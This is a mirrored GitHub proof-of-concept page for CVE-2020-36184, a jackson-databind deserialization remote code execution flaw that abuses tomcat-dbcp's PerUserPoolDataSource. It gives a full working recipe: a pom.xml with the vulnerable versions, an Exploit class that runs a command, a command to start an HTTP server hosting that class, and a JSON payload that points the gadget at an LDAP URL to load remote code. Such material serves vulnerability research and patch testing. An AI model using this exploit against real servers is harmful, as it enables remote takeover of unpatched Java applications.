Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2020-36184 PoC — FasterXML jackson-databind 代码问题漏洞

Source
https://github.com/Al1ex/CVE-2020-36184
Associated Vulnerability
Title:FasterXML jackson-databind 代码问题漏洞 (CVE-2020-36184)
Description:FasterXML jackson-databind是一个基于JAVA可以将XML和JSON等数据格式与JAVA对象进行转换的库。Jackson可以轻松的将Java对象转换成json对象和xml文档,同样也可以将json、xml转换成Java对象。 FasterXML jackson-databind 2.x before 2.9.10.8 存在代码问题漏洞,该漏洞源于org.apache.tomcat.dbcp.dbcp2.datasources.PerUserPoolDataSource错误地处理se
Description
CVE-2020-36184 && Jackson-databind  RCE
Readme
## Description
FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the interaction between serialization gadgets and typing, related to org.apache.tomcat.dbcp.dbcp2.datasources.PerUserPoolDataSource.

## How to RCE

pom.xml

```
<?xml version="1.0" encoding="UTF-8"?>
<project xmlns="http://maven.apache.org/POM/4.0.0"
         xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
         xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
    <modelVersion>4.0.0</modelVersion>

    <groupId>com.jacksonTest</groupId>
    <artifactId>jacksonTest</artifactId>
    <version>1.0-SNAPSHOT</version>
    <dependencies>
        <dependency>
            <groupId>com.fasterxml.jackson.core</groupId>
            <artifactId>jackson-databind</artifactId>
            <version>2.9.10.7</version>
        </dependency>
        <!-- https://mvnrepository.com/artifact/org.apache.tomcat/tomcat-dbcp -->
        <dependency>
            <groupId>org.apache.tomcat</groupId>
            <artifactId>tomcat-dbcp</artifactId>
            <version>10.0.0</version>
        </dependency>

        <dependency>
            <groupId>org.slf4j</groupId>
            <artifactId>slf4j-nop</artifactId>
            <version>1.7.2</version>
        </dependency>
        <!-- https://mvnrepository.com/artifact/javax.transaction/jta -->
        <dependency>
            <groupId>javax.transaction</groupId>
            <artifactId>jta</artifactId>
            <version>1.1</version>
        </dependency>
    </dependencies>
</project>
```

Exploit.javax
```
import java.lang.Runtime;

public class Exploit {
    static {
        try {
            Runtime.getRuntime().exec("calc");
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}
```
SimpleServer
```
python -m  SimpleHTTPServer 4444
```

LDAPServer

![ldap](img/ldap.png)


POC.java

```
import com.fasterxml.jackson.databind.ObjectMapper;
import com.fasterxml.jackson.databind.SerializationFeature;


public class POC {
    public static void main(String[] args) throws Exception {
        ObjectMapper mapper = new ObjectMapper();
        mapper.enableDefaultTyping();
        mapper.configure(SerializationFeature.FAIL_ON_EMPTY_BEANS, false);
        String json = "[\"org.apache.tomcat.dbcp.dbcp2.datasources.PerUserPoolDataSource\", {\"dataSourceName\":\"ldap://127.0.0.1:1399/Exploit\"}]";
        Object obj = mapper.readValue(json, Object.class);
        mapper.writeValueAsString(obj);

    }
}
```

Result:

![result](img/result.png)

## Gadget Chain
```
PerUserPoolDataSource
	->InstanceKeyDataSource.setDataSourceName
    		->InstanceKeyDataSource.getconnection 
        			->InstanceKeyDataSource.testCPDS
                		->lookup
```
File Snapshot

 [4.0K]  /data/pocs/bf9673c3833840142a5ca54e3f79b722e0426e18
├── [4.0K]  img
│   ├── [9.8K]  ldap.png
│   └── [258K]  result.png
└── [2.8K]  README.md

1 directory, 3 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.